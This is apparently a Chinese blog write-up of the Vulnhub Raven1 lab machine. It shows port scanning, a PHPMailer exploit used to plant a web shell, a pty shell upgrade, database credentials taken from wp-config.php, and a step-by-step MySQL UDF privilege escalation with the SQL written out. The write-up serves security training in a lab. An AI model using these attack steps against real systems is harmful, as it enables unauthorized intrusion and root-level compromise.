vulnhub渗透日记09:Raven1

已于 2023-07-21 20:00:31 修改
阅读量69 收藏
点赞数
分类专栏: Vulnhub靶机渗透日记 文章标签: web安全 linux
于 2023-07-21 17:56:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/131857017
版权

前言

⏰时间:2023.7.21
🗺️靶机地址:https://www.vulnhub.com/entry/raven-1,256/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

发现主机:nmap -sn
在这里插入图片描述探测开放端口:masscan --rate=100000 -p 1-65535 192.168.58.155
在这里插入图片描述探测服务:nmap -sS -A -T5 -p 22,80,111,44716 192.168.58.155
在这里插入图片描述扫目录发现http://192.168.58.155/vendor/
在这里插入图片描述查看VERSION
在这里插入图片描述

漏洞利用

在这里插入图片描述修改40974.py
在这里插入图片描述在这里插入图片描述访问contact.php,在去访问http://192.168.58.155/haha.php即可上线

在这里插入图片描述开启稳定shell

python -c 'import pty;pty.spawn("/bin/bash")'

/var/www/flag2.txt
在这里插入图片描述进入wordpress发现wp-config.php,存在数据库账号密码 R@v3nSecurity
在这里插入图片描述

UDF提权

1. 账号是否具有insert权限 (以root账号为佳)
2. 看是否具有写入条件
    mysql> show variables like '%secure%';
    show variables like '%secure%';
    +------------------+-------+
    | Variable_name    | Value |
    +------------------+-------+
    | secure_auth      | OFF   |
    | secure_file_priv |       |
    +------------------+-------+
    当secure_file_priv为NULL时,不允许导入导出,无法提权
    当secure_file_priv为/tmp时,只允许在/tmp目录下导入导出
    当secure_file_priv为空时,不限制,可以提权
3.查看插件目录:
	show variables like '%plugin%';
	+---------------+------------------------+
	| Variable_name | Value                  |
	+---------------+------------------------+
	| plugin_dir    | /usr/lib/mysql/plugin/ |
	+---------------+------------------------+
	如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹

用sqlmap中的cloak.py -d -i lib_mysqludf_sys.so_
生成lib_mysqludf_sys.so,传到目标/tmp目录,名字改exp.so

use mysql;
create table foo(line blob); #创建foo表,包含line这列可存放大型二进制数据
insert into foo values(load_file('/tmp/exp.so')); #将exp.so存入
select * from foo into dumpfile '/usr/lib/mysql/plugin/exp.so'; #再导入到plugin中
create function sys_eval returns string soname 'exp.so'; #创建提权方法sys_eval
select sys_eval('whoami');   # 执行系统命令
select sys_eval('ls /root');
select sys_eval('find / -name flag* 2>/dev/null');

在这里插入图片描述在这里插入图片描述

_WHOAM1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Raven:Raven是Chez Scheme的软件包经理
02-02
1. **安装Raven**:首先需要在Chez Scheme环境下安装Raven本身,通常通过下载源码并按照指示编译安装。 2. **配置Raven**:设置Raven的配置文件,指定仓库地址和其他个性化选项。 3. **搜索库**:通过`raven search`...
nest:Raven的软件包管理器
02-04
巢 Raven的软件包管理器。建立依赖rustup,提供最新的每晚工具链建筑巢编译Nest非常简单: cargo build --all运行测试如果要确保在编译Nest时一切正常,可以运行测试: cargo test --all奔跑的巢您不应该在不受保护...
vulnhub渗透日记05:Raven2
ericalezl的博客
07-16 123
时间:2023.7.16,靶机来自vulnhub,欢迎您的查阅,水平有限,如果您发现有误,望指正!
vulnhub吧唧——RAVEN: 1
xstlikeja的博客
07-14 139
我们利用MySQL的udf提权后修改find的权限为root,然后在find目录下启动一个新的shell,此时就具有root权限,在MySQL中仅仅是一个单向的shell,并不能进行交互,所以我们需要进一步提升shell,此时我们在find的shell下可以更改root的密码然后登录他的ssh,至此,这台吧唧我们已经拿到了最高的权限——root。我们发现Michael的密码并不能破解,但Steven的密码破解出来是pink84,我们现在拿到了一个账号和他对应的密码,但是他是哪儿的账号和密码呢。
Vulnhub靶机渗透之 RAVEN: 1
_Co1a
07-30 1886
靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networki
Vulnhub靶机渗透Raven1(超级详细)
Mysmycbx的博客
05-19 7659
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
raven.cr:Raven是Sentry的Crystal客户
02-05
而Raven是Sentry的一个客户端实现,这里我们关注的是针对Crystal编程语言的Raven.cr版本。 首先,让我们深入了解一下`Crystal`。Crystal是一种静态类型的、编译型的、面向对象的、多范式的编程语言,设计目标是既...
Raven:Raven是GNULinux的简单软件包管理器
02-03
1. **软件包搜索**:用户可以使用Raven搜索可用的软件包,以便了解哪些软件可以通过Raven安装。 2. **安装软件包**:通过简单的命令,Raven能够从官方或者自定义的软件仓库下载并安装软件包,减少了手动配置的麻烦...
raven-repository:Raven R 包快照存储库
06-09
注册 openshift 并下载rhc工具,然后(这里我将应用程序命名为raven ): rhc app create raven diy # Create applicationrhc cartridge add postgresql-9.2 -a raven # Add the persistence cartridgerhc app stop...
“微软蓝屏”事件暴露了网络安全哪些问题?
csdn_aspnet的专栏
07-23 1438
这次由微软系统软件更新引发的“微软蓝屏”事件,无疑是对全球IT基础设施韧性与安全性的重大考验。850万台设备的故障,以及对航空、医疗和传媒等关键行业的广泛影响,再次突显出我们在网络安全和系统稳定性方面的脆弱性。一、问题解析1、更新管理的复杂性:随着技术的不断进步,软件更新的复杂性也在增加。大型系统中,需要兼顾各种硬件、软件和环境,确保更新不会引发兼容性问题,而这往往十分困难。2、供应链风险:如这次事件所示,一个小小的缺陷就可能通过供应链扩散,造成全球性影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 1031
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
WAF+API安全代表厂商|瑞数信息入选IDC报告《生成式AI推动下的中国网络安全硬件市场现状及技术发展趋势》
科技云报道
07-25 709
目前,传统在Web应用安全网关等产品中的API防护功能已经不足以防护日益复杂的API攻击,API安全应站在全生命周期管理的角度,从API安全开发和部署(API测试等)开始,配合加密、身份认证、权限管控、API安全测试、检测、监测、威胁防护、威胁处理等能力来进行管理和控制。WAF可以作为硬件设备、企业软件、虚拟设备或公有云服务部署。从API的开发部署开始,融合静态应用安全测试、动态应用安全测试、API资产梳理、API鉴权认证、API检测监测、威胁管理的全生命周期防护解决方案,帮助用户一键解决API安全问题。
2024春秋杯网络安全联赛夏季赛Crypto(AK)解题思路及用到的软件
符啸九天的博客
07-22 1058
2024春秋杯网络安全联赛夏季赛Crypto解题思路以及用到的软件1.vm(虚拟机kali)和Ubuntu,正常配置即可B站有很多。2.Visual Studio Code(里面要配置python,crypto库和Sagemath数学软件系统Sagemath)。3.随波逐流工作室 (1o1o.xyz)ctf工具。2024春秋竞赛ezzzecc视频解题思路2024春秋竞赛happy2024视频解析2024春秋竞赛夏季赛Signature解题思路
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 574
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
标题:微软蓝屏事件:网络安全的警钟与反思
chezabo6116的博客
07-23 621
标题:微软蓝屏事件:网络安全的警钟与反思 近日,微软视窗系统软件更新引发的“微软蓝屏”事件,不仅在全球范围内引发了广泛关注,也对全球IT基础设施的韧性与安全性提出了严峻挑战。这次事件暴露了网络安全和系统稳定性方面的诸多问题。本文将从软件更新流程中的风险管理、预防大规模故障的最佳方案、以及跨领域连锁反应的行业影响三个方面,探讨如何构建更加稳固和安全的网络环境。 方向一:软件更新流程中的风险管理和质量控制机制 软件更新是系统维护的重要环节,但不当的更新流程可能会引入新的风险。此次“微软蓝屏”事件就是一个典型案例
网络安全之不同阶段攻防手段(四)
子非渔
07-25 309
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
企业产品网络安全建设日志0725
最新发布
KD的疯狂实验室
07-25 292
显然,这种说法是安全工作中的一个挑战。因为推动时间也蛮长了,做出了:只要升级一部分,易升级的组件即可。前天遇到的挑战是某后端部门排期出现问题,本应该做漏洞提升的时间被其他工作插入。测试团队需要进一步支持,因为组件升级,许可证升级以及后续的编码安全建立都是一串蚂蚱。基础的安全种子显然已经埋下。团队有人A提出,是否有必要按照某软件报的漏洞信息实施安全提升工作。我们的信息安全策略就是通过覆盖三防组件风险,降低我们产品自身的风险。特别是搬出来A之前在,其他企业的经验,即。安全宣讲和必要的沟通是无法回避的。
速盾:如何评估 CDN 对网络安全的影响?
zhuguowang01的博客
07-25 413
评估CDN对网络安全的影响是十分重要的,以确保网络环境的安全性和稳定性。在使用CDN时,原始服务器和CDN节点之间的通信可能会受到影响,从而降低了TLS的安全性。通过评估CDN供应商和节点的安全性,以及CDN对数据保护的能力,可以确定CDN是否对网络安全构成威胁,并采取相应的安全措施来保护网络环境。CDN节点的安全性:评估CDN节点的安全性,包括节点的物理安全、访问控制措施和安全管理实践。确保节点受到适当的保护,以防止非授权的访问和潜在的攻击。数据的完整性和保密性:考虑CDN对数据的完整性和保密性的影响。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值